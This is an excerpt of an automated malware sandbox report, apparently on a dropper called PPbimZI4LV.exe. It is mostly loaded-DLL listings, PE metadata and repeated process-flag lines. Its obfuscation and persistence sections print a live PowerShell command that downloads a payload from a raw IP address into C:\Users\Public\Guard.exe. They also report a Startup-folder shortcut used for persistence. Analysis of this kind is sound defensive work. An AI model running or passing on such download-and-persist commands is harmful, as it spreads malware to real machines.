Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: PPbimZI4LV.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: PPbimZI4LV.exeStatic file information: File size 1083904 > 1048576
Source: PPbimZI4LV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: PPbimZI4LV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: PPbimZI4LV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: PPbimZI4LV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: PPbimZI4LV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: PPbimZI4LV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: PPbimZI4LV.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: PPbimZI4LV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: PPbimZI4LV.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: PPbimZI4LV.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: PPbimZI4LV.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: PPbimZI4LV.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: PPbimZI4LV.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\PPbimZI4LV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/xvDYouPUJ" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Users\user\Desktop\PPbimZI4LV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/xvDYouPUJ" -OutFile "C:\Users\Public\Guard.exe""Jump to behavior
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF643926D1C LoadLibraryA,GetProcAddress,1_2_00007FF643926D1C
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF643957399 push rdi; ret 1_2_00007FF6439573A2
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439578FD push rdi; ret 1_2_00007FF643957904
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD33EA19DB pushad ; ret 8_2_00007FFD33EA19E9
Source: C:\Users\Public\Guard.exeCode function: 11_2_00118B75 push ecx; ret 11_2_00118B88
Source: C:\Users\Public\Guard.exeCode function: 11_2_0010CBDB push eax; retf 11_2_0010CBF8
Source: C:\Users\Public\Guard.exeCode function: 11_2_0010CC06 push eax; retf 11_2_0010CBF8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C08B75 push ecx; ret 17_2_00C08B88
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00BFF1DF push ebp; ret 17_2_00BFF1E1
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00BFF1CF push ebp; ret 17_2_00BFF1DD
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00BFD280 push ss; ret 17_2_00BFD29A

Persistence and Installation Behavior

barindex
Source: C:\Users\Public\Guard.exeFile created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
Source: C:\Users\Public\Guard.exeFile created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file

Boot Survival

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.urlJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.urlJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (132).png
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF643944514 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,1_2_00007FF643944514
Source: C:\Users\Public\Guard.exeCode function: 11_2_001759B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,11_2_001759B3
Source: C:\Users\Public\Guard.exeCode function: 11_2_00105EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,11_2_00105EDA
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C659B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,17_2_00C659B3
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00BF5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,17_2_00BF5EDA
Source: C:\Users\Public\Guard.exeCode function: 11_2_001133B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_001133B7
Source: C:\Users\user\Desktop\PPbimZI4LV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PPbimZI4LV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
